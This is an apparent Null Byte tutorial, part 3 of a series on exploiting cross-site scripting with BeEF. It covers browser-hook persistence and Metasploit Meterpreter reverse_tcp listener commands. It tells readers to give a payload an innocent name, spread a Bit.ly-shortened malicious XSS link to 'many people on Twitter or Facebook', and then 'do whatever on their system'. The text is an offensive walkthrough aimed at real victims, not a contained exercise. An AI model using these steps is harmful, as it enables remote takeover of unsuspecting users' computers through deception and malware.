Wonder How ToGadget HacksNext RealityNull Byte
how to

Exploiting XSS with BeEF: Part 3

May 7, 2015 11:29 PM
635666092654848476.jpg

Now that we have control over a victim's browser, we need to use some attacks to maintain the connection, or even better: upload a shell.

Creating a Persistent Connection

Now that the victim's browser is hooked, we need to quickly set up a persistence method to keep the connection alive. To do this, click on the IP address under the Online folder, and go to the Commands tab.

635666088881723280.jpg

Open Persistence and click on whatever method you like. For this tutorial, I'm going to use the Confirm Close Tab method. To do this, press the Execute button in the bottom right corner. Now if the user tries to close the tab, it will repeatedly ask the user if they want to close the browser (unless it's Chrome or Opera < 12).

635666098622036289.jpg

Creating a Shell

Now that we have a persistent connection, we can do all sorts of things with the browser. We can play sounds, check information, and even try to exploit the machine. What we're going to do now is create a Meterpreter shell with Metasploit. We don't actually need BeEF to do this, though.

Step 1: Creating the Payload

Go ahead and make a payload that you want to execute. I'll just use a basic Meterpreter payload for this example. Rename this to something innocent or related like HTML5 Updated Graphics.

Step 2: Create the Listener

Open Metasploit and type use /multi/handler and set payload windows/meterpreter/reverse_tcp (or whatever payload you used). Type exploit -j -z. Upload this to your webserver.

635666127501410495.jpg

Step 3: Creating a Malicious URL

Now we need to create a link that will ask the victim to download our malicious file. The script for doing this is

The URL for this search query is http://www.insecurelabs.org/Task/Rule1?query=

I would recommend shortening this with Bit.ly.

Step 4: Wait for the Connection

Send this link out to many people on Twitter or Facebook and keep listening for connections. You should get many connections very quickly. Just remember that the payload you made should be named something related to the vulnerable website.

Voila!

Now we've got a Meterpreter session!

635666127888755573.jpg

Now you can migrate and do whatever on their system! The best part is, the payload was downloaded from the official website, so they won't think it's malware.

Conclusion

As you can see, the XSS vulnerability is a fun and easy vulnerability to exploit. I hope you learned much from this series, and if you want some more, I could add some "bonus" attacks to do. ;)

C|H of C3

Related Articles

637263493835297420.jpg

How to Use Zero-Width Characters to Hide Secret Messages in Text (& Even Reveal Leaks)
636455706472146367.jpg

How to Hide DDE-Based Attacks in MS Word

Comments

No Comments Exist

Be the first, drop a comment!